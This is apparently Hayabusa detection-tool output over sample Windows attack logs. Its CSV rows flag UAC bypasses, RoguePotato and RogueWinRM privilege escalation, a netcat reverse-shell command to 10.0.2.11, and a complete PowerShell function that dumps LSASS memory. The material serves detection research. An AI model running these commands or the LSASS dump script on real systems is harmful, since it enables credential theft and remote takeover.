Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx 2020-05-07 22:13:01.683 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - T1088 - UACBypass - changepk UACME61 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\Launcher.SystemSettings\shell\open\command\(Default): c:\Windows\System32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 7084 | PGUID: 747F3D96-095D-5EB4-0000-001082FF1700,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_61_Changepk.evtx 2020-05-07 22:13:02.481 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""c:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\ChangePk.exe"" | LID: 0x2ecba | PID: 5216 | PGUID: 747F3D96-095E-5EB4-0000-0010D46F1800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_61_Changepk.evtx 2020-05-10 09:09:36.635 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: NetworkServiceExploit.exe -i -c ""c:\Windows\System32\cmd.exe"" | Process: C:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: ""cmd.exe"" | LID: 0x3e4 | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx 2020-05-10 09:09:36.647 +09:00,MSEDGEWIN10,17,info,,Pipe Created,\frAQBc8Wsa1 | Process: c:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01,../hayabusa-rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx 2020-05-10 09:09:36.662 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\frAQBc8Wsa1 | Process: System | PID: 4 | PGUID: 747F3D96-3B8B-5EB5-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx 2020-05-10 09:09:36.701 +09:00,MSEDGEWIN10,17,info,,Pipe Created, | Process: c:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01,../hayabusa-rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx 2020-05-10 09:09:36.701 +09:00,MSEDGEWIN10,18,info,,Pipe Connected, | Process: c:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx 2020-05-10 09:09:36.701 +09:00,MSEDGEWIN10,17,info,,Pipe Created, | Process: c:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01,../hayabusa-rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx 2020-05-10 09:09:36.701 +09:00,MSEDGEWIN10,18,info,,Pipe Connected, | Process: c:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx 2020-05-10 09:09:36.709 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: NetworkServiceExploit.exe -i -c ""c:\Windows\System32\cmd.exe"" | LID: 0x3e7 | PID: 372 | PGUID: 747F3D96-4640-5EB7-0000-0010EF364B01",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx 2020-05-10 09:09:38.023 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49682 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-3B8B-5EB5-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx 2020-05-10 09:09:38.023 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49682 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-3B8B-5EB5-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx 2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: c:\Windows\System32\cmd.exe | LID: 0x3e7 | PID: 7672 | PGUID: 747F3D96-4647-5EB7-0000-0010B3454B01,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx 2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx 2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,../hayabusa-rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx 2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx 2020-05-10 09:11:16.714 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 180 | PGUID: 747F3D96-46A4-5EB7-0000-00109FE74C01,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx 2020-05-10 09:11:20.824 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.101:49683 (MSEDGEWIN10) | Dst: 192.168.56.1:139 (LAPTOP-JU4M3I0E) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-3B8B-5EB5-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx 2020-05-12 08:21:56.493 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: RoguePotato.exe -r 10.0.2.11 -e ""c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe"" -l 9999 | Process: C:\Users\IEUser\Tools\PrivEsc\RoguePotato.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ""cmd.exe"" | LID: 0x3e5 | PID: 4200 | PGUID: 747F3D96-DE14-5EB9-0000-0010BE064300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx 2020-05-12 08:21:56.519 +09:00,MSEDGEWIN10,17,medium,,Pipe Created_Sysmon Alert,Rogue Epmapper np detected - possible RoguePotato privesc | Pipe: \RoguePotato\pipe\epmapper | Process: c:\Users\IEUser\tools\PrivEsc\RoguePotato.exe | PID: 4200 | PGUID: 747F3D96-DE14-5EB9-0000-0010BE064300,../hayabusa-rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx 2020-05-12 08:21:56.519 +09:00,MSEDGEWIN10,17,critical,Evas | PrivEsc,EfsPotato Named Pipe,,../hayabusa-rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx 2020-05-12 08:21:56.562 +09:00,MSEDGEWIN10,18,medium,,Pipe Connected_Sysmon Alert,Rogue Epmapper np detected - possible RoguePotato privesc | Pipe: \RoguePotato\pipe\epmapper | Process: System | PID: 4 | PGUID: 747F3D96-545A-5EBA-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx 2020-05-12 08:21:56.562 +09:00,MSEDGEWIN10,18,critical,Evas | PrivEsc,EfsPotato Named Pipe,,../hayabusa-rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx 2020-05-12 08:21:56.587 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe | Process: C:\Users\IEUser\Tools\Misc\nc64.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: RoguePotato.exe -r 10.0.2.11 -e ""c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe"" -l 9999 | LID: 0x3e7 | PID: 4468 | PGUID: 747F3D96-DE14-5EB9-0000-00107C0F4300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx 2020-05-12 08:21:56.661 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe | LID: 0x3e7 | PID: 224 | PGUID: 747F3D96-DE14-5EB9-0000-001079154300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx 2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 5252 | PGUID: 747F3D96-DE32-5EB9-0000-00103FC14300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx 2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,../hayabusa-rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx 2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx 2020-05-13 00:06:49.019 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: Akagi.exe 58 c:\Windows\System32\cmd.exe | Process: C:\Users\IEUser\Tools\PrivEsc\Akagi.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x89eef | PID: 1036 | PGUID: 747F3D96-BB89-5EBA-0000-001057413600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx 2020-05-13 00:06:49.019 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx 2020-05-13 00:06:49.183 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - Rogue Windir - UAC bypass prep | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Environment\windir: C:\Users\IEUser\AppData\Local\Temp\DNeruK | Process: C:\Windows\explorer.exe | PID: 1036 | PGUID: 747F3D96-BB89-5EBA-0000-001057413600,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx 2020-05-13 00:06:49.184 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe | Process: C:\Windows\explorer.exe | PID: 1036 | PGUID: 747F3D96-BB89-5EBA-0000-001057413600,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx 2020-05-13 00:06:49.211 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 328 310 0000028A37652590 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6968 | PGUID: 747F3D96-BB89-5EBA-0000-0010FB4C3600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx 2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386 | Process: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\DllHost.exe /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41} | LID: 0x89ebf | PID: 1088 | PGUID: 747F3D96-BB89-5EBA-0000-001042653600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx 2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx 2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx 2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,high,Exec | Evas | PrivEsc,CMSTP UAC Bypass via COM Object Access,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx 2020-05-13 00:06:49.447 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386 | LID: 0x89ebf | PID: 4688 | PGUID: 747F3D96-BB89-5EBA-0000-001019683600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx 2020-05-13 09:28:16.122 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay | LID: 0x3e7 | PID: 8052 | PGUID: 747F3D96-3F20-5EBB-0000-0010035E3600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx 2020-05-13 09:28:52.873 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3080 | PGUID: 747F3D96-3F44-5EBB-0000-001017813700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx 2020-05-13 09:28:52.914 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 6344 | PGUID: 747F3D96-3F44-5EBB-0000-0010EA933700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx 2020-05-13 09:28:52.950 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceAndNoImpersonation -p -s wcncsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 6372 | PGUID: 747F3D96-3F44-5EBB-0000-0010D29A3700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx 2020-05-24 10:13:47.756 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: RogueWinRM.exe -p c:\Windows\System32\cmd.exe | Process: C:\Users\IEUser\Tools\PrivEsc\RogueWinRM.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ""cmd.exe"" | LID: 0x3e5 | PID: 3960 | PGUID: 747F3D96-CA4B-5EC9-0000-0010B8CB3700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx 2020-05-24 10:13:48.864 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3044 | PGUID: 747F3D96-CA4C-5EC9-0000-001093D53700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx 2020-05-24 10:13:50.327 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: RogueWinRM.exe -p c:\Windows\System32\cmd.exe | LID: 0x3e7 | PID: 1516 | PGUID: 747F3D96-CA4E-5EC9-0000-00109FE23700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx 2020-05-24 10:13:50.330 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Tools\PrivEsc\RogueWinRM.exe | PID: 3960 | PGUID: 747F3D96-CA4B-5EC9-0000-0010B8CB3700,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx 2020-05-24 10:13:51.206 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49680 (MSEDGEWIN10) | Dst: 127.0.0.1:5985 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\svchost.exe | PID: 3044 | PGUID: 747F3D96-CA4C-5EC9-0000-001093D53700,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx 2020-05-24 10:13:51.206 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49680 (MSEDGEWIN10) | Dst: 127.0.0.1:5985 (MSEDGEWIN10) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Users\IEUser\Tools\PrivEsc\RogueWinRM.exe | PID: 3960 | PGUID: 747F3D96-CA4B-5EC9-0000-0010B8CB3700,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx 2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: c:\Windows\System32\cmd.exe | LID: 0x3e7 | PID: 4456 | PGUID: 747F3D96-CA52-5EC9-0000-001027FA3700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx 2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx 2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,../hayabusa-rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx 2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx 2020-06-30 23:24:08.254 +09:00,MSEDGEWIN10,4104,medium,,Potentially Malicious PwSh,"function Memory($path) { $Process = Get-Process lsass $DumpFilePath = $path $WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting') $WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic') $Flags = [Reflection.BindingFlags] 'NonPublic, Static' $MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags) $MiniDumpWithFullMemory = [UInt32] 2 # $ProcessId = $Process.Id $ProcessName = $Process.Name $ProcessHandle = $Process.Handle $ProcessFileName = ""$($ProcessName).dmp"" $ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName $FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create) $Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle, $ProcessId, $FileStream.SafeFileHandle, $MiniDumpWithFullMemory, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero)) $FileStream.Close() if (-not $Result) { $Exception = New-Object ComponentModel.Win32Exception $ExceptionMessage = ""$($Exception.Message) ($($ProcessName):$($ProcessId))"" # Remove any partially written dump files. For example, a partial dump will be written # in the case when 32-bit PowerShell tries to dump a 64-bit process. Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue throw $ExceptionMessage } else { ""Memdump complete!"" } }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx 2020-06-30 23:24:08.254 +09:00,MSEDGEWIN10,4104,info,,PwSh Scriptblock Log,"function Memory($path) { $Process = Get-Process lsass $DumpFilePath = $path $WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting') $WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic') $Flags = [Reflection.BindingFlags] 'NonPublic, Static' $MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags) $MiniDumpWithFullMemory = [UInt32] 2 # $ProcessId = $Process.Id $ProcessName = $Process.Name $ProcessHandle = $Process.Handle $ProcessFileName = ""$($ProcessName).dmp"" $ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName $FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create) $Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle, $ProcessId, $FileStream.SafeFileHandle, $MiniDumpWithFullMemory, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero)) $FileStream.Close() if (-not $Result) { $Exception = New-Object ComponentModel.Win32Exception $ExceptionMessage = ""$($Exception.Message) ($($ProcessName):$($ProcessId))"" # Remove any partially written dump files. For example, a partial dump will be written # in the case when 32-bit PowerShell tries to dump a 64-bit process. Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue throw $ExceptionMessage } else { ""Memdump complete!"" } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx 2020-06-30 23:24:08.254 +09:00,MSEDGEWIN10,4104,high,CredAccess,PowerShell Get-Process LSASS in ScriptBlock,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx 2020-06-30 23:24:08.254 +09:00,MSEDGEWIN10,4104,low,Evas,Use Remove-Item to Delete 